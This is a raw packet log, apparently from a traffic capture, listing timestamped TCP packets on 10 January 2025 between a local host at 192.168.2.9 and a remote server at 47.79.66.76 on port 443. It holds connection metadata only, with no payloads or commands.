                                                                                                Jan 10, 2025 07:52:11.591878891 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.613365889 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.613425970 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.613456964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.613466024 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.613490105 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.613506079 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.617464066 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.617511034 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.617558956 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.617568970 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.617595911 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.617610931 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.622778893 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.622826099 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.622860909 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.622868061 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.622910976 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.622910976 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.628325939 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.628369093 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.628396988 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.628403902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.628437996 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.628448963 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.634462118 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.634505987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.634530067 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.079922915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.085104942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.085148096 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.085184097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.085191011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.085252047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.085252047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.090754986 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.090796947 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.090867043 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.090867043 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.090884924 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.091042042 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.096946001 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.096990108 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.097031116 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.097038031 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.097059011 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.097091913 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.133070946 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.133117914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.133194923 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.133203030 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.133218050 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.133300066 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.135205984 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.135251045 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.135302067 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.135308981 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.135332108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.135351896 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.146301031 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.146347046 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.146387100 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.146394014 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.146482944 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.146482944 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.168760061 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.168804884 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.168840885 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.168848038 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.168876886 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.168925047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.172152996 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.172200918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.172463894 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.172463894 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.172472954 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.172569990 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.177582026 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.177630901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.177694082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.177694082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.177702904 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.177875042 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.183211088 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.183253050 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.183336020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.183336020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.183343887 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.183497906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.189248085 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.189292908 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.189348936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.189356089 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.189373970 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.189426899 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.225467920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.225565910 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.225575924 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.225594997 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.225662947 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.225662947 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.227633953 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.227720976 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.227729082 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.227752924 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.227823973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.227823973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.238691092 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.238734961 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.238785982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.238785982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.238801956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.238862991 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.261147976 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.261193037 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.261245012 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.261261940 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.261280060 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.261406898 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.264662981 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.264715910 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.264749050 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.264774084 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.264791012 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.264832973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.270083904 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.270126104 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.270160913 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.270179033 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.270219088 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.270219088 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.275577068 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.275624037 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.275669098 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.275669098 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.275685072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.275882959 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.281786919 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.281829119 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.281944036 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.281944036 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.281963110 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.282047987 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.317989111 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.318017960 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.318326950 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.318326950 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.318356037 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.318419933 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.320033073 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.320055008 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.320099115 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.320105076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.320156097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.320156097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.330965042 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.330986977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.331038952 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.331058979 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.331111908 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.331163883 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.353599072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.353682041 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.353825092 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.353825092 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.353837013 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.354202986 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.357110977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.357135057 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.357311964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.357311964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.357325077 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.357393026 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.362390995 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.362426043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.362459898 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.362469912 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.362487078 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.362579107 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.368118048 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.368165016 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.368212938 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.368212938 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.368233919 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.368273973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.374177933 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.374207973 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.374861002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.374861002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.374872923 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.375116110 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.410367012 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.410399914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.410557985 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.410557985 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.410579920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.410767078 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.412512064 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.412533998 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.412575006 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.830727100 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.836714029 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.836746931 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.836808920 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.836817026 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.836834908 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.836924076 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.872762918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.872800112 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.872870922 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.872870922 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.872885942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.872961998 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.874856949 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.874903917 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.874968052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.874968052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.874979019 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.875030041 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.885787964 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.885823011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.885881901 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.885910988 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.885950089 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.886096954 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.908441067 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.908476114 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.908538103 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.908560038 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.908577919 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.908623934 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.911813021 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.911835909 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.911909103 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.911909103 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.911920071 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.912355900 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.917293072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.917339087 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.917368889 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.917390108 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.917428017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.917428017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.923012972 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.923044920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.923141003 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.923141003 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.923150063 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.923357964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.929162025 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.929191113 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.929533005 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.929533958 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.929542065 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.929702044 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.965176105 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.965214014 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.965296984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.965296984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.965317011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.965491056 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.967242002 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.967269897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.967318058 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.967324018 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.967338085 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.967473984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.978364944 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.978446960 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.978468895 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.978494883 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.978533030 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.978533030 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.000988007 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.001043081 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.001101971 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.001101971 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.001113892 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.001161098 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.004352093 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.004420042 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.004436016 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.004447937 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.004504919 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.004604101 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018009901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018039942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018102884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018114090 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018147945 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018147945 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018734932 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018758059 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018857002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018857002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018865108 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018940926 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.021749973 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.021773100 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.021841049 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.021848917 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.021886110 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.021886110 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.057998896 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.058058977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.058082104 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.058093071 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.058110952 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.058135986 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.059880018 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.059926987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.059954882 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.059962034 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.059981108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.059994936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.070820093 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.070887089 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.070899963 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.070919991 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.070947886 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.070957899 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.093722105 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.093760967 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.093811035 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.093825102 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.093848944 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.093869925 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.096751928 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.096775055 CET4434975147.79.66.76192.168.2.9
